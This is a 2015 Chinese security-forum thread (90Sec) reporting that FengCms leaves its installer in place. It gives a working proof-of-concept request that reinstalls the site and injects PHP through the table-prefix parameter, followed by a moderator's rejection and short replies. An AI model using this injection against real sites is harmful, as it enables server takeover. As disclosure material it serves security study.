九零»90WiKi - 90Sec Team --== 资料库==-- 账号审核 {Account audit} FengCms重装系统+GetShell
返回列表

[【未通过】] FengCms重装系统+GetShell

[复制链接]
管理05 发表于 2015-9-3 22:27:41 | 显示全部楼层 |阅读模式

管理|主题 |帖子 |积分 936

测试环境:win+php5.3+gpc=off
重装系统:
Fengcms默认安装安装完成是不删除install文件夹的
Install/index.php 做了一点限制:
1.jpg
但是这个限制完全没什么用,直接可绕过重新安装。
GetShell:
在重装的时候,参数没有限制,导致直接可getshell。
/install/index.php?host=localhost&user=root&password=root&dbname=fengcms&prefix=f_');phpinfo();//&url_type=0&step=4
2.jpg
访问主页直接getshell。
3.jpg


=====================================
http://www.wooyun.org/bugs/wooyun-2014-076648
漏洞是很老的了,乌云早已经公布出来了。无法确定真实性,故不予通过。

回复

举报

Bsmali4 发表于 2015-9-3 23:44:43 | 显示全部楼层

正式成员|主题 |帖子 |积分 393

www.hack.com亮了
回复

举报

c4rt1y 发表于 2015-9-4 01:17:36 | 显示全部楼层

九零元老|主题 |帖子 |积分 107

没有exit....蛋疼ing
回复

举报

huotoo 发表于 2015-9-6 14:57:38 | 显示全部楼层

正式成员|主题 |帖子 |积分 227

感谢分享 ....只是这个CMS貌似不常见  没有见过
回复

举报

返回列表
快速回复 返回顶部 返回列表